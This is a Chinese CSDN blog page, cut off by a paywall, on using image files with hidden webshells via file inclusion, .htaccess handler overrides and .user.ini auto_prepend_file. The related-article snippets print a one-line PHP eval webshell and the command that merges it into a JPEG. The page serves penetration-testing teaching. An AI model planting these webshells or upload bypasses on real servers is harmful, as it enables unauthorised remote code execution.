图片马利用的三种方式

最新推荐文章于 2024-03-04 22:32:39 发布
VIP文章 最新推荐文章于 2024-03-04 22:32:39 发布
阅读量2.7k 收藏 1
点赞数
文章标签: apache 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48435065/article/details/127122770
版权

1、文件包含

首先上传图片马,利用文件包含上传的图片马,使得php文件执行,然后使用菜刀连接。

2、通过.htaccess

如果可以上传.htaccess则可以利用.htaccess

.htaccess文件(或者"")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

  • .htaccess文件只能用于apahce,不能用于iisnginx等中间件

<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>

shell为文件名,这个意思是将shell文件当成php文件解析。

再上传名为shell的图片马,则可以把图片解析成php文件。

3、.user.ini

  • .user.ini只能用于Server APIFastCGI模式下,正常情况下apache不是运行在此模块下的。

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。

我们这边利用.user,ini先执行auto_prepend_file函数

最低0.47元/天 解锁文章
isunsprit
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大学网络安全课程复习资料-内容非常全面(看完必过) 思维导图的格式,一张图片涵盖所有内容
12-24
大学网络安全课程的复习资料,每一节的重点都包含在里面了,内容非常丰富 看完必过 爆肝一万字 全是重点 干货满满 目录包括 密码学:基本加密算法、公钥密码等。 操作系统安全:账户管理、权限控制、恶意软件防护等。 数据库安全:SQL注入、XSS攻击、DDoS攻击等。 网络安全技术: 防火墙技术:配置规则、安全策略等。 入侵检测与防御:网络流量分析、异常行为检测等。 反病毒软件:病毒、木、间谍软件的防护等。 入侵检测系统:网络监控、事件分析等。 网络协议安全: TCP/IP协议安全:端口扫描、漏洞利用等。 HTTP/HTTPS协议安全:数据加密、身份验证等。 DNS协议安全:域名劫持、恶意重定向等。 网络安全实践: 模拟攻击与防御:例如DDoS攻击、SQL注入等。 实战演练:与实际企业合作,进行真实的网络安全演练。 案例分析:分析真实的网络攻击案例,学习应对策略。
图片制作
weixin_44791273的博客
10-04 476
找到一张比较小的图片,命名为1.jpg,如下图: 打开一个文本文档,输入:<?php @eval($_POST['123']);?> 直接将文件名改为1.php图片和木所在的文档打开cmd,输入:copy 1.jpg/b+1.php 2.jpg 2.jpg即为图片,用记事本打开,在一堆乱码的末尾可以看到我们的一句话木 ...
php,关于File Upload的一些思考
weixin_33635110的博客
03-09 185
原标题:关于File Upload的一些思考在web渗透中,文件上传是最简单直接的方式之一。 但是碰到完全不做校验的代码直接上传getshell,很难有这样的运气;大部分时候都有检测,甚至多处设卡。若按设卡点的顺序来说可大致分为:前端js检验、防护检测(waf)、服务端检测。这里就讲如何绕过服务端代码的检测,服务端会出现文件上传的什么安全配置。一、文件上传安全配置一图顶千言,请看下图: 二、绕过服...
文件上传之图片
最新发布
2301_80661529的博客
03-04 724
图片:就是在正常图片中插入木
关于图片的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
图片,有木,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源码吧,过关方式也是叫我们上传图片。。。 然后我还要说吗一下,图片不是一张木图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 5803
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
php 图片制作,关于图片的正确用法
weixin_39735005的博客
03-10 2857
图片,有木,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。我们先看一下源码吧,过关方式也是叫我们上传图片。。。然后我还要说吗一下,图片不是一张木图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢一:准备图片需要用到DOS指令Bashcopy 001.jpeg/b + test.php/a 2.jpg这个指令的意思是,把001.jpeg和test.php合并...
文件上传漏洞进阶教程/白名单绕过/图片制作/图片执行
ChenD的学习笔记
10-23 6854
文件上传漏洞进阶教程/白名单绕过/图片制作/图片执行
制作图片四种方式 cmd中 copy 1.jpg/b+2.php 3.jpg /b是二进制形式打开 /a是ascii方式打开 看到有人说一定要把图片放前面,木放后面才能
为了低调的博客
08-20 1381
看到有人说一定要把图片放前面,木放后面才能成功,我亲自试了这两种制作方式(另一种图片放后面),均能成功连接,但是后者的一句话木在文件开头,不推荐!/a是ascii方式打开。/b是二进制形式打开。
php 图片,php图片实现原理
weixin_27310417的博客
03-09 4295
什么是木病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。那,php的木是长什么样的呢?我们来看下面这段代码:...
图片、文字转PCB文件
01-28
你还在为PROTEL输入汉字发愁吗? 你还在为复制电路板、抄电路板发愁吗? 欢迎您使用五一电子推出的终生免费、免安装、无插件、不修改注册表的、纯绿、中文版的文字图片转PCB软件! 你只需输入字符、设定字体大小,点击生成PCB文件即可! 如果你需要抄板,你只需要扫描电路板成BMP、JPG或者GIF图片利用点阵图象软件结合本软件就可以快速抄板! 本软件体积小巧玲珑,单个文件,设计有标尺,方便您评估电路板元素的尺寸,可以设定图层,抄多层板时更方便!你还在为PROTEL输入汉字发愁吗? 你还在为复制电路板、抄电路板发愁吗? 欢迎您使用五一电子推出的终生免费、免安装、无插件、不修改注册表的、纯绿、中文版的文字图片转PCB软件! 你只需输入字符、设定字体大小,点击生成PCB文件即可! 如果你需要抄板,你只需要扫描电路板成BMP、JPG或者GIF图片利用点阵图象软件结合本软件就可以快速抄板! 本软件体积小巧玲珑,单个文件,设计有标尺,方便您评估电路板元素的尺寸,可以设定图层,抄多层板时更方便!本软件生成的PCB文件可以用PROTEL99导入,也可以用英文版或者先生的汉化版打开,比国外的那个英文的要先进一点,版本要高一点。
VC实现利用底层键盘钩子屏蔽系统按键模拟简单的病毒
08-21
利用底层键盘钩子实现对系统键盘消息的拦截丢弃,可以修改成针对特定按键屏蔽方行。程序伪装成一个Jpg图片文件运行后显示为一张图片,实际会锁定键盘,无其他危害行为,请放心研究,仅仅为了学习研究使用。某些杀毒软件会报成木,这个是正常的,因为本例操作了键盘钩子。为了方便解除锁定本例没有屏蔽鼠标,可以在任务栏上右键正常关闭恢复键盘。
攻击与防范(ppt 详细讲述木的攻击与如何防范)
10-16
攻击与防范(ppt 详细讲述木的攻击与如何防范),让你更好的了解如何不被人利用攻击
php实现Linux服务器排查及加固功能
10-24
主要介绍了php实现Linux服务器排查及加固功能,本文给出了根据特征码查找、搜索最近被修改的文件、修改php.ini、修改nginx.conf等方法,需要的朋友可以参考下
图片 php 菜刀,图片的制作以及菜刀的使用
weixin_28741413的博客
04-14 663
有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析图片是WEB渗透测试时的必备...
2-7 【实验】14-图片绕过+代码审计
山兔的博客
03-27 3241
这节课,我们要开始讲pass-13,讲的跟我们之前稍有点不一样,因为这个漏洞,它不是单个的利用,是结合其它漏洞一块去利用 今天的漏洞是上传图片服务器图片就是图片的一种木,就是带有木图片图片 注意的有三点: 1.保证上传后的图片中仍然包含完整的一句话或webshell代码。 2.使用文件包含漏洞能运行图片中的恶意代码。 这点就是我们这篇文章讲的组合漏洞的一个利用,就是利用文件包含漏洞 3.图片要.jpg,.png,.gif三种后缀都上传成功才算过关! 图片就是我们在图片当中插入一句
css3 transform实现图片旋转木3d
09-09
CSS3 transform属性可以实现图片旋转木3D效果。通过使用旋转和位移变换,我们可以使一组图片像在一个旋转木上一样循环展示。 首先,我们需要一个包含图片的HTML容器,例如一个div元素,并将其设置为相对定位(position: relative),以便我们可以对其中的图片进行绝对定位。 然后,我们可以使用CSS3的transform属性来对每个图片进行旋转和位移变换。通过设置rotateY()和translateZ()等函数来实现3D旋转效果。其中,rotateY()函数可以设置图片绕Y轴旋转的角度,而translateZ()函数可以设置图片在Z轴上的位移。 接着,我们可以使用CSS3的transition属性来添加过渡效果。通过设置transition属性,我们可以使图片在旋转过程中平滑过渡。 最后,为了实现旋转木的效果,我们可以使用CSS3的animation属性来循环播放。通过设置animation属性,我们可以定义动画的名称、总时间、循环次数等属性,以便图片可以循环播放。 通过以上步骤,我们可以利用CSS3的transform属性实现图片旋转木3D效果。这样,我们就可以在网页中展示一个漂亮且动态的图片旋转木效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值